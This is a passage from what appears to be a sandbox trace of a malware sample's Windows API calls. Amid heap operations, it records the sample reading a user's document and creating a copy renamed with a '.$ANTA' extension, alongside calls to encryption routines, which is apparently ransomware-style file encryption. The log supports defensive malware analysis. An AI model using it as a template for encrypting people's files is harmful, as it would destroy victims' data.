(HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0079.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0079.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0079.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0079.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0079.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0079.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0079.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0079.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0079.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0079.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0079.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0079.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0079.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0079.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0079.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0079.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0079.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4370 [0079.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359c08 [0079.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0079.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0079.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4370 | out: hHeap=0x1780000) returned 1 [0079.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0079.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0079.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0079.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0079.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359c08 | out: hHeap=0x1780000) returned 1 [0079.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0079.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0079.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0079.959] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb")) returned 0x10 [0079.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0079.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0079.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0079.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0079.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0079.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0079.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0079.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0079.960] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\JzioP.odp.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\jziop.odp.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0079.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0079.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0079.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0079.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0079.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0079.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0079.961] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0079.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0079.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0079.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0079.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0079.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0079.961] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0079.961] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0079.961] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0079.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0079.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0079.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0079.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0079.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0079.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0079.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0079.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0079.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0079.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0079.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e05020 [0079.964] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea50 | out: lpNewFilePointer=0x0) returned 1 [0079.964] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ea78*=0x13b7, lpOverlapped=0x0) returned 1 [0079.965] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ea78*=0x0, lpOverlapped=0x0) returned 1 [0079.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0079.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13b7) returned 0x499a008 [0079.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e05020 | out: hHeap=0x1780000) returned 1 [0079.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0079.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0079.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0079.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0079.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13b7) returned 0x499b3c8 [0079.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0079.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.968] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0079.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0079.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0079.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0079.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13b7) returned 0x499a008 [0079.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0079.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0079.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.968] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0079.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0079.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0079.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0079.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0079.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0079.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0079.969] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0079.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0079.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0079.969] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0079.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0079.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0079.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28e0 [0079.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0079.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0079.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0079.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13b7) returned 0x499a008 [0079.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28f0 [0079.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0079.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2850 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0079.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27a0 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0079.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cace8 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13b7) returned 0x499c788 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0079.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0079.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0079.971] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0079.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0079.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0079.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0079.971] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0079.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0079.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0079.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0079.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0079.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0079.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0079.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0079.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0079.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0079.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0079.971] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0079.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0079.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0079.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0079.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2870 [0079.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0079.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0079.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0079.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae20 [0079.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0079.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0079.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0079.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0079.972] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0079.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0079.972] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0079.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0079.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0079.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 